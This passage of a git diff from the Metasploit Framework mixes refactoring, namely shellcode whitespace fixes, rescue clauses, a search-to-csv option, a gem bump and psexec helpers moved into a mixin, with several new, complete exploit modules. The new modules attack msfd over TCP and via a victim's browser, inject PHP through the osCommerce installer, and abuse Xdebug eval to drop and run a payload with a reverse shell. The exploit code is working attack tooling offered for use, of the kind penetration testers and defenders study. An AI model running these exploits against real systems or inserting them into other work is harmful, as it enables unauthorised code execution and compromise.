"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
@ -127,56 +127,56 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" + # shl r8, 23
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" + # shl r8, 1
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

54
lib/msf/core/payload/solaris.rb
View File

@ -75,55 +75,55 @@ module Msf::Payload::Solaris
if (test_arch.include?(ARCH_X86))
# Syscall code
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
"\x6a\x65" +# pushl $0x65 #
"\x89\xe6" +# movl %esp,%esi #
"\xf7\x56\x04" +# notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
"\x6a\x65" + # pushl $0x65 #
"\x89\xe6" + # movl %esp,%esi #
"\xf7\x56\x04" + # notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
# Prepend
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xca" +# movb $0xca,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xca" + # movb $0xca,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xcb" + # movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x2e" + # movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xff\xd6" # call *%esi #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xff\xd6" # call *%esi #
end
# Prepend syscall code to prepend block

8
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -207,7 +207,7 @@ class Db
if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
print_status("Recreated default workspace")
end
rescue Exception => e
rescue => e
print_error "Failed to rename workspace: #{e.message}"
e.backtrace.each { |line| print_error "#{line}"}
end
@ -544,7 +544,7 @@ class Db
when mode == [:tag]
begin
add_host_tag(host_ranges, tag_name)
rescue ::Exception => e
rescue => e
if e.message.include?('Validation failed')
print_error(e.message)
else
@ -1130,7 +1130,7 @@ class Db
end
framework.db.update_note(update_opts)
rescue Exception => e
rescue => e
elog "There was an error updating note with ID #{note.id}: #{e.message}"
next
end
@ -1333,7 +1333,7 @@ class Db
end
loot.ltype = types.first if types
framework.db.update_loot(loot.as_json.symbolize_keys)
rescue Exception => e
rescue => e
elog "There was an error updating loot with ID #{loot.id}: #{e.message}"
next
end

48
lib/msf/ui/console/command_dispatcher/modules.rb
View File

@ -19,8 +19,9 @@ module Msf
CMD_USE_TIMEOUT = 3
@@search_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner."],
"-S" => [ true, "Row search filter."],
"-h" => [ false, "Help banner"],
"-o" => [ true, "Send output to a file in csv format"],
"-S" => [ true, "Search string for row filter"],
)
def commands
@ -410,7 +411,12 @@ module Msf
end
def cmd_search_help
print_line "Usage: search <keywords>"
print_line "Usage: search [ options ] <keywords>"
print_line
print_line "OPTIONS:"
print_line " -h Show this help information"
print_line " -o <file> Send output to a file in csv format"
print_line " -S <string> Search string for row filter"
print_line
print_line "Keywords:"
{
@ -442,26 +448,29 @@ module Msf
return
end
match = ''
match = ''
search_term = nil
output_file = nil
@@search_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
print_error("Deprecated option. Use type:#{val} instead")
cmd_search_help
return
when "-S", "--search"
when "-S"
search_term = val
when "-h"
cmd_search_help
return
when "-S"
search_term = val
when '-o'
output_file = val
else
match += val + " "
end
}
if match.empty? && search_term.nil?
print_error("Keywords or search argument required\n")
cmd_search_help
return
end
# Display the table of matches
tbl = generate_module_table("Matching Modules", search_term)
Msf::Modules::Metadata::Cache.instance.find(match).each do |m|
@ -472,7 +481,15 @@ module Msf
m.name
]
end
print_line(tbl.to_s)
if output_file
print_status("Wrote search results to #{output_file}")
::File.open(output_file, "wb") { |ofd|
ofd.write(tbl.to_csv)
}
else
print_line(tbl.to_s)
end
end
#
@ -487,13 +504,6 @@ module Msf
return @@search_opts.fmt.keys
end
case (words[-1])
when "-r"
return RankingName.sort.map{|r| r[1]}
when "-t"
return %w{auxiliary encoder exploit nop payload post}
end
[]
end

4
metasploit-framework.gemspec
View File

@ -70,9 +70,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.33'
spec.add_runtime_dependency 'metasploit-payloads', '1.3.34'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.7'
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.8'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.

112
modules/auxiliary/admin/smb/ms17_010_command.rb
View File

@ -5,6 +5,7 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
@ -92,119 +93,18 @@ class MetasploitModule < Msf::Auxiliary
@ip = ip
# Try and authenticate with given credentials
res = execute_command(text, bat)
if res
for i in 0..(datastore['RETRY'])
Rex.sleep(datastore['DELAY'])
# if the output file is still locked then the program is still likely running
if (exclusive_access(text))
break
elsif (i == datastore['RETRY'])
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
get_output(text)
end
cleanup_after(text, bat)
end
#
# TODO: the rest shamelessly copypasta from auxiliary/admin/smb/psexec_command
# it should probably be mixin'd. I have changed some of vprint/print tho
# => zerosum0x0
#
# Executes specified Windows Command
def execute_command(text, bat)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
vprint_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
# Retrive output from command
def get_output(file)
vprint_status("Getting the command output...")
output = smb_read_file(@smbshare, @ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
# Report output
vprint_good("Command completed successfuly!")
# zerosum0x0: this is better with Verbose off in this case
print_status("Output for \"#{datastore['COMMAND']}\":")
print_line("#{output}")
print_good("Command completed successfuly!")
print_status("Output for \"#{datastore['COMMAND']}\":\n")
print_line("#{output}\n")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
# check if our process is done using these files
def exclusive_access(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
vprint_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
return true
end
# Removes files created during execution.
def cleanup_after(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
return
end
vprint_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end

114
modules/auxiliary/admin/smb/psexec_command.rb
View File

@ -69,112 +69,22 @@ class MetasploitModule < Msf::Auxiliary
print_error("Unable to authenticate with given credentials: #{autherror}")
return
end
res = execute_command(text, bat)
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
if res
for i in 0..(datastore['RETRY'])
Rex.sleep(datastore['DELAY'])
# if the output file is still locked then the program is still likely running
if (exclusive_access(text))
break
elsif (i == datastore['RETRY'])
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
get_output(text)
unless output.nil?
print_good("Command completed successfuly!")
print_status("Output for \"#{datastore['COMMAND']}\":\n")
print_line("#{output}\n")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
cleanup_after(text, bat)
disconnect
end
end
# Executes specified Windows Command
def execute_command(text, bat)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
print_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
# Retrive output from command
def get_output(file)
print_status("Getting the command output...")
output = smb_read_file(@smbshare, @ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
# Report output
print_good("Command completed successfuly!")
vprint_status("Output for \"#{datastore['COMMAND']}\":")
vprint_line("#{output}")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
# check if our process is done using these files
def exclusive_access(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
print_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
return true
end
# Removes files created during execution.
def cleanup_after(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
return
end
print_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end

5
modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb
View File

@ -55,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
])
end
# This module returns false positives for credentialed logins
def autofilter
false
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10).to_i
end

77
modules/exploits/multi/browser/msfd_rce_browser.rb Normal file
View File

@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. This module connects to the msfd-socket
through the victim's browser.
To execute msfconsole-commands in JavaScript from a web application,
this module places the payload in the POST-data. These POST-requests
can be sent cross-domain and can therefore be sent to localhost on the
victim's machine. The msfconsole-command to execute code is 'rbi -e
"CODE"'.
Exploitation when the browser is running on Windows is unreliable and
the exploit is only usable when IE is used and the quiet-flag has been
passed to msf-daemon.
},
'License' => BSD_LICENSE,
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Targets' =>
[
[ 'Automatic', {}],
],
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'DisableNops' => 'True',
'BadChars' => "\x22\x0a"
},
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options([
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
])
end
def exploit
super
end
def on_request_uri(cli, request)
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
sc = payload.encoded
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
var1 = rand_text_alpha(rand(6..11))
var2 = rand_text_alpha(rand(6..11))
html = <<-EOS
<html>
<head></head>
<body>
<script>
var #{var1} = new XMLHttpRequest();
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
var #{var2} = String("#{shellcode}");
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
</script>
</body>
</html>
EOS
print_status("#{msg} Sending HTML...")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end

100
modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb Normal file
View File

@ -0,0 +1,100 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'osCommerce Installer Unauthenticated Code Execution',
'Description' => %q{
If the /install/ directory was not removed, it is possible for an unauthenticated
attacker to run the "install_4.php" script, which will create the configuration
file for the installation. This allows the attacker to inject PHP code into the
configuration file and execute it.
},
'Author' => [
'Simon Scannell', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '44374'],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'osCommerce 2.3.4.1', { } ],
],
'DisclosureDate' => 'Apr 30 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'install.php'),
'method' => 'GET'
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body.include?('osCommerce Website')
return CheckCode::Safe
end
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'index.php'),
'method' => 'GET'
})
if res.body.include?('configure.php') && res.body.include?('The following files need to have their file permissions set to world-writeable (chmod 777):')
vprint_error 'configure.php is not writable'
return CheckCode::Safe
end
CheckCode::Appears
end
def trigger
send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'includes/configure.php'),
'method' => 'GET'
})
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
data = {
'DIR_FS_DOCUMENT_ROOT' => './',
'DB_DATABASE' => "');#{payload.encoded}/*"
}
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'install.php?step=4'),
'method' => 'POST',
'vars_post' => data
})
trigger
end
end

66
modules/exploits/multi/misc/msfd_rce_remote.rb Normal file
View File

@ -0,0 +1,66 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. If this socket is accessible on a remote
interface, an attacker can execute commands on the victim's machine.
If msfd is running with higher privileges than the current local user,
this module can also be used for privilege escalation. In that case,
port forwarding on the compromised host can be used.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
},
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'License' => BSD_LICENSE,
'Platform' => "ruby",
'Arch' => ARCH_RUBY,
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'BadChars' => "\x27\x0a",
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(55554)
])
end
def check
connect
data = sock.get_once
if data.include?("msf")
disconnect
return Exploit::CheckCode::Appears
end
disconnect
return Exploit::CheckCode::Unknown
end
def exploit
connect
sock.get_once
sock.put "irb -e '" + payload.encoded + "'\n"
disconnect
end
end

114
modules/exploits/unix/http/xdebug_unauth_exec.rb Normal file
View File

@ -0,0 +1,114 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end
def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})
client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end

211
modules/exploits/windows/smb/ms17_010_psexec.rb
View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
@ -119,221 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
def smb_pwn()
case target.name
when 'Automatic'
if powershell_installed?
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
print_status('Selecting PowerShell target')
powershell
execute_powershell_payload
else
print_status('Selecting native target')
native_upload
native_upload(datastore['SHARE'])
end
when 'PowerShell'
powershell
execute_powershell_payload
when 'Native upload'
native_upload
when 'MOF upload'
mof_upload
mof_upload(datastore['SHARE'])
end
handler
end
# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to
# be moved into a mixin
def powershell_installed?
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
case datastore['SHARE'].upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = datastore['PSH_PATH']
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def powershell
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = datastore['SHARE']
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = datastore['SHARE'].dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{filename}", 'rwct')
end
exe = ''
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#{filename}...")
else
print_status("Created \\#{filename}...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if datastore['SHARE'] == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#{filename}"
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#{filename}...")
